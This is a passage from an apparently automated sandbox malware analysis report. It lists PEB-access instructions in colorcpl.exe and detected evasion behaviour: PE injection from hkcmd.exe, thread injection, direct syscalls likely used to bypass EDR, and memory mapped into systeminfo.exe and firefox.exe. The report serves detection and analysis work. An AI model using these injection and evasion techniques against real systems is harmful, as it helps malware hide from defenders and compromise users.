                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D78D9 mov eax, dword ptr fs:[00000030h]11_2_2C4D78D9
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C58F8F8 mov eax, dword ptr fs:[00000030h]11_2_2C58F8F8
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50C8F9 mov eax, dword ptr fs:[00000030h]11_2_2C50C8F9
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50C8F9 mov eax, dword ptr fs:[00000030h]11_2_2C50C8F9
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E38E0 mov eax, dword ptr fs:[00000030h]11_2_2C4E38E0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E38E0 mov eax, dword ptr fs:[00000030h]11_2_2C4E38E0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E38E0 mov eax, dword ptr fs:[00000030h]11_2_2C4E38E0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C59A8E4 mov eax, dword ptr fs:[00000030h]11_2_2C59A8E4
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C55C89D mov eax, dword ptr fs:[00000030h]11_2_2C55C89D
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D0887 mov eax, dword ptr fs:[00000030h]11_2_2C4D0887
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C58F889 mov eax, dword ptr fs:[00000030h]11_2_2C58F889
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C550946 mov eax, dword ptr fs:[00000030h]11_2_2C550946
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DF950 mov eax, dword ptr fs:[00000030h]11_2_2C4DF950
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DF950 mov eax, dword ptr fs:[00000030h]11_2_2C4DF950
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E9950 mov eax, dword ptr fs:[00000030h]11_2_2C4E9950
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E9950 mov eax, dword ptr fs:[00000030h]11_2_2C4E9950
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50B970 mov eax, dword ptr fs:[00000030h]11_2_2C50B970
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50B970 mov eax, dword ptr fs:[00000030h]11_2_2C50B970
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50B970 mov eax, dword ptr fs:[00000030h]11_2_2C50B970
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C58F97D mov eax, dword ptr fs:[00000030h]11_2_2C58F97D
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C55C97C mov eax, dword ptr fs:[00000030h]11_2_2C55C97C
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4C7967 mov eax, dword ptr fs:[00000030h]11_2_2C4C7967
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4F7962 mov eax, dword ptr fs:[00000030h]11_2_2C4F7962
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4F6962 mov eax, dword ptr fs:[00000030h]11_2_2C4F6962
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4F6962 mov eax, dword ptr fs:[00000030h]11_2_2C4F6962
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4F6962 mov eax, dword ptr fs:[00000030h]11_2_2C4F6962
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FD978 mov eax, dword ptr fs:[00000030h]11_2_2C4FD978
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50196E mov eax, dword ptr fs:[00000030h]11_2_2C50196E
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50196E mov eax, dword ptr fs:[00000030h]11_2_2C50196E
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C51096E mov eax, dword ptr fs:[00000030h]11_2_2C51096E
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C51096E mov edx, dword ptr fs:[00000030h]11_2_2C51096E
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C51096E mov eax, dword ptr fs:[00000030h]11_2_2C51096E
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C55C912 mov eax, dword ptr fs:[00000030h]11_2_2C55C912
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4C8918 mov eax, dword ptr fs:[00000030h]11_2_2C4C8918
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4C8918 mov eax, dword ptr fs:[00000030h]11_2_2C4C8918
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FB919 mov eax, dword ptr fs:[00000030h]11_2_2C4FB919
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C54E908 mov eax, dword ptr fs:[00000030h]11_2_2C54E908
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C54E908 mov eax, dword ptr fs:[00000030h]11_2_2C54E908
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CF910 mov eax, dword ptr fs:[00000030h]11_2_2C4CF910
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CF910 mov eax, dword ptr fs:[00000030h]11_2_2C4CF910
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CF910 mov eax, dword ptr fs:[00000030h]11_2_2C4CF910
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CF910 mov eax, dword ptr fs:[00000030h]11_2_2C4CF910
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CF910 mov eax, dword ptr fs:[00000030h]11_2_2C4CF910
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CF910 mov eax, dword ptr fs:[00000030h]11_2_2C4CF910
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CF910 mov eax, dword ptr fs:[00000030h]11_2_2C4CF910
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CF910 mov eax, dword ptr fs:[00000030h]11_2_2C4CF910
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CF910 mov eax, dword ptr fs:[00000030h]11_2_2C4CF910
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CF910 mov eax, dword ptr fs:[00000030h]11_2_2C4CF910
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CF910 mov eax, dword ptr fs:[00000030h]11_2_2C4CF910
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4C7931 mov eax, dword ptr fs:[00000030h]11_2_2C4C7931
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C55892A mov eax, dword ptr fs:[00000030h]11_2_2C55892A
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C5049D0 mov eax, dword ptr fs:[00000030h]11_2_2C5049D0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C5AB9DF mov eax, dword ptr fs:[00000030h]11_2_2C5AB9DF
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C5AB9DF mov eax, dword ptr fs:[00000030h]11_2_2C5AB9DF
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C59A9D3 mov eax, dword ptr fs:[00000030h]11_2_2C59A9D3
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D59C0 mov eax, dword ptr fs:[00000030h]11_2_2C4D59C0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D59C0 mov eax, dword ptr fs:[00000030h]11_2_2C4D59C0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D59C0 mov eax, dword ptr fs:[00000030h]11_2_2C4D59C0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D59C0 mov eax, dword ptr fs:[00000030h]11_2_2C4D59C0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DA9D0 mov eax, dword ptr fs:[00000030h]11_2_2C4DA9D0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DA9D0 mov eax, dword ptr fs:[00000030h]11_2_2C4DA9D0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DA9D0 mov eax, dword ptr fs:[00000030h]11_2_2C4DA9D0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DA9D0 mov eax, dword ptr fs:[00000030h]11_2_2C4DA9D0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DA9D0 mov eax, dword ptr fs:[00000030h]11_2_2C4DA9D0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DA9D0 mov eax, dword ptr fs:[00000030h]11_2_2C4DA9D0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FD9D0 mov eax, dword ptr fs:[00000030h]11_2_2C4FD9D0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FD9D0 mov eax, dword ptr fs:[00000030h]11_2_2C4FD9D0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FD9D0 mov esi, dword ptr fs:[00000030h]11_2_2C4FD9D0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FD9D0 mov eax, dword ptr fs:[00000030h]11_2_2C4FD9D0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FD9D0 mov eax, dword ptr fs:[00000030h]11_2_2C4FD9D0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FD9D0 mov eax, dword ptr fs:[00000030h]11_2_2C4FD9D0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FD9D0 mov eax, dword ptr fs:[00000030h]11_2_2C4FD9D0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FD9D0 mov eax, dword ptr fs:[00000030h]11_2_2C4FD9D0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C5029F9 mov eax, dword ptr fs:[00000030h]11_2_2C5029F9
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C5029F9 mov eax, dword ptr fs:[00000030h]11_2_2C5029F9
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C57F99B mov eax, dword ptr fs:[00000030h]11_2_2C57F99B
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C57F99B mov eax, dword ptr fs:[00000030h]11_2_2C57F99B
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C57F99B mov eax, dword ptr fs:[00000030h]11_2_2C57F99B
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C57F99B mov eax, dword ptr fs:[00000030h]11_2_2C57F99B
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C57F99B mov eax, dword ptr fs:[00000030h]11_2_2C57F99B
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C57F99B mov eax, dword ptr fs:[00000030h]11_2_2C57F99B
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C57F99B mov ecx, dword ptr fs:[00000030h]11_2_2C57F99B
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C57F99B mov ecx, dword ptr fs:[00000030h]11_2_2C57F99B
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C57F99B mov eax, dword ptr fs:[00000030h]11_2_2C57F99B
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C57F99B mov eax, dword ptr fs:[00000030h]11_2_2C57F99B
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C57F99B mov eax, dword ptr fs:[00000030h]11_2_2C57F99B
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C57F99B mov eax, dword ptr fs:[00000030h]11_2_2C57F99B
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C57F99B mov eax, dword ptr fs:[00000030h]11_2_2C57F99B
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CB991 mov eax, dword ptr fs:[00000030h]11_2_2C4CB991
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CB991 mov eax, dword ptr fs:[00000030h]11_2_2C4CB991
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D09AD mov eax, dword ptr fs:[00000030h]11_2_2C4D09AD
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D09AD mov eax, dword ptr fs:[00000030h]11_2_2C4D09AD
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C5589B3 mov esi, dword ptr fs:[00000030h]11_2_2C5589B3
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C5589B3 mov eax, dword ptr fs:[00000030h]11_2_2C5589B3
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C5589B3 mov eax, dword ptr fs:[00000030h]11_2_2C5589B3
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E29A0 mov eax, dword ptr fs:[00000030h]11_2_2C4E29A0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E29A0 mov eax, dword ptr fs:[00000030h]11_2_2C4E29A0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E29A0 mov eax, dword ptr fs:[00000030h]11_2_2C4E29A0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E29A0 mov eax, dword ptr fs:[00000030h]11_2_2C4E29A0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E29A0 mov eax, dword ptr fs:[00000030h]11_2_2C4E29A0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E29A0 mov eax, dword ptr fs:[00000030h]11_2_2C4E29A0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E29A0 mov eax, dword ptr fs:[00000030h]11_2_2C4E29A0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E29A0 mov eax, dword ptr fs:[00000030h]11_2_2C4E29A0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E29A0 mov eax, dword ptr fs:[00000030h]11_2_2C4E29A0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E29A0 mov eax, dword ptr fs:[00000030h]11_2_2C4E29A0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E29A0 mov eax, dword ptr fs:[00000030h]11_2_2C4E29A0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E29A0 mov eax, dword ptr fs:[00000030h]11_2_2C4E29A0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E29A0 mov eax, dword ptr fs:[00000030h]11_2_2C4E29A0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D99BE mov eax, dword ptr fs:[00000030h]11_2_2C4D99BE
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4C9A40 mov ecx, dword ptr fs:[00000030h]11_2_2C4C9A40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E0A5B mov eax, dword ptr fs:[00000030h]11_2_2C4E0A5B
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E0A5B mov eax, dword ptr fs:[00000030h]11_2_2C4E0A5B
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D6A50 mov eax, dword ptr fs:[00000030h]11_2_2C4D6A50
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D6A50 mov eax, dword ptr fs:[00000030h]11_2_2C4D6A50
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D6A50 mov eax, dword ptr fs:[00000030h]11_2_2C4D6A50
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D6A50 mov eax, dword ptr fs:[00000030h]11_2_2C4D6A50
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D6A50 mov eax, dword ptr fs:[00000030h]11_2_2C4D6A50
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D6A50 mov eax, dword ptr fs:[00000030h]11_2_2C4D6A50
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D6A50 mov eax, dword ptr fs:[00000030h]11_2_2C4D6A50
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C54CA72 mov eax, dword ptr fs:[00000030h]11_2_2C54CA72
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C54CA72 mov eax, dword ptr fs:[00000030h]11_2_2C54CA72
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C563A78 mov eax, dword ptr fs:[00000030h]11_2_2C563A78
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell decode and execute
                    Source: Yara matchFile source: amsi32_6600.amsi.csv, type: OTHER
                    Allocates memory in foreign processes
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 73A0000 protect: page execute and read and writeJump to behavior
                    Creates a thread in another existing process (thread injection)
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeThread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 73A1250Jump to behavior
                    Found direct / indirect Syscall (likely to bypass EDR)
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtQueryVolumeInformationFile: Direct from: 0x776D2F2CJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtQuerySystemInformation: Direct from: 0x776D48CCJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtAllocateVirtualMemory: Direct from: 0x776D48ECJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtOpenSection: Direct from: 0x776D2E0CJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtDeviceIoControlFile: Direct from: 0x776D2AECJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtAllocateVirtualMemory: Direct from: 0x776D2BECJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtQueryInformationProcess: Direct from: 0x776D2C26Jump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtResumeThread: Direct from: 0x776D2FBCJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtWriteVirtualMemory: Direct from: 0x776D490CJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtCreateUserProcess: Direct from: 0x776D371CJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtClose: Direct from: 0x776D2B6C
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtAllocateVirtualMemory: Direct from: 0x776D3C9CJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtSetInformationThread: Direct from: 0x776C63F9Jump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtQueryAttributesFile: Direct from: 0x776D2E6CJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtSetInformationThread: Direct from: 0x776D2B4CJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtCreateKey: Direct from: 0x776D2C6CJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtReadVirtualMemory: Direct from: 0x776D2E8CJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtResumeThread: Direct from: 0x776D36ACJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtMapViewOfSection: Direct from: 0x776D2D1CJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtWriteVirtualMemory: Direct from: 0x776D2E3CJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtCreateMutant: Direct from: 0x776D35CCJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtAllocateVirtualMemory: Direct from: 0x776D2BFCJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtDelayExecution: Direct from: 0x776D2DDCJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtQuerySystemInformation: Direct from: 0x776D2DFCJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtReadFile: Direct from: 0x776D2ADCJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtTerminateThread: Direct from: 0x776D2FCCJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtQueryInformationToken: Direct from: 0x776D2CACJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtCreateFile: Direct from: 0x776D2FECJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtOpenFile: Direct from: 0x776D2DCCJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtOpenKeyEx: Direct from: 0x776D2B9CJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtNotifyChangeKey: Direct from: 0x776D3C2CJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtSetInformationProcess: Direct from: 0x776D2C5CJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeNtProtectVirtualMemory: Direct from: 0x776D2F9CJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 73A0000 value starts with: 4D5AJump to behavior
                    Maps a DLL or memory area into another process
                    Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: NULL target: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: NULL target: C:\Windows\SysWOW64\systeminfo.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: NULL target: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exe protection: read writeJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: NULL target: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                    Modifies the context of a thread in another process (thread injection)
                    Source: C:\Windows\SysWOW64\systeminfo.exeThread register set: target process: 5236Jump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 73A0000Jump to behavior
